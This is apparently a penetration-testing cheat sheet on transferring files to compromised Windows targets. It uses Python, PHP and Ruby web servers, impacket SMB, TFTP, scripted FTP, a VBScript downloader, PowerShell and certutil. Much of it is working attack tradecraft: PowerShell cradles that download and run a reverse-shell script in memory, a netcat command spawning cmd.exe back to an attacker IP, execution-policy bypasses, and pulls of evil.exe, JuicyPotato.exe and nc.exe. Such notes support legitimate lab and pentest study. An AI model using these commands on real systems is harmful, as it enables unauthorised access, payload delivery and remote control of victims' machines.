😌Windows File Transfer

simple webserver

| python 2.7

python2 -m SimpleHTTPServer

| python3

python3 -m http.server

| ruby

ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start"

| php

php -S 0.0.0.0:8888

Smbsever (impacket)

impacket-smbserver

copy \\<ip>\<path>\<file> # Linux to windows

copy <file> \\<ip>\<path>\ # Windows to linux

| kali:

smbserver.py  myshare /tmp/smbshare -smb2

| windows:

net use M: \\<kali-ip>\myshare

\\10.10.10.1\privesc.exe  whoami

TFTP

hacker

rootkali: mkdir /tftp
root@kali: atftpd --daemon --port 69 \tftp\
root@kali: cp nc.exe \tftp

| target

C:ProgramFiles\SLmail\System> tftp -i 192.168.30.5 GET nc.exe

FTP

| hacker

root@kali: apt-get install pure-ftpd
root@kali: cat setup-ftp
root@kali: ./setup-ftp

root@kali: cat ftp.commands
echo open 192.168.58.5 21 > ftp.txt
echo offsec>> ftp.txt
echo lab>> ftp.txt
echo bin>> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

SCP

scp <fileToUpload> user@remote:/path

VBScript

Here is a good script to make a wget-clone in VB.

If it doesn't work try piping it through unix2dos before copying it.

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

You then execute the script like this:

cscript wget.vbs http://192.168.10.5/evil.exe evil.exe

PowerShell

| Download File to path

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile "IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.14.5/JuicyPotato.exe','C:\users\merlin\documents\potato.exe')"

echo IEX(New-Object System.Net.WebClient).downloadFile('http://10.10.10.3:8000/loli.txt','C:\Users\pelado\Desktop\loli.txt') | powershell -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile

| Download testfile and executes it in the memory

powershell.exe  -nop -ep bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.6/Invoke-PowerShellTcp.ps1')"

|powershell full path:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe

| powershell wget

powershell wget "http://10.10.10.10/nc.exe" -outfile "nc.exe"
nc.exe -e cmd.exe 10.10.10.10 4444

wget.psl

| kali

  echo $storageDir = $pwd > wget.psl
  echo $webclient = New-Object System.Net.WebClient >>wget.psl
  echo $url = "http://10.10.14.23:8000/PowerUp.ps1 >> wget.psl
  echo $file = "new-exploit.exe" >>wget.psl
  echo $webclient.DownloadFile($url,$file) >>wget.psl

| target:

C:\programs> copy y pasteo lo de arriba\\
C:\programs> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.psl \\
C:\programs> dir new-exploit.exe\\
 cool\\

netcat

nc -lvp 1234 > <out_file>

nc <ip> 1234 < <in _file>

curl

curl <url> -o outfile

certutils

| windows

certutil.exe -urlcache -split -f "http://ip-addr:port/file" [output-file]

PreviousLinux File Transfer NextBuffer Overflow

Last updated 1 year ago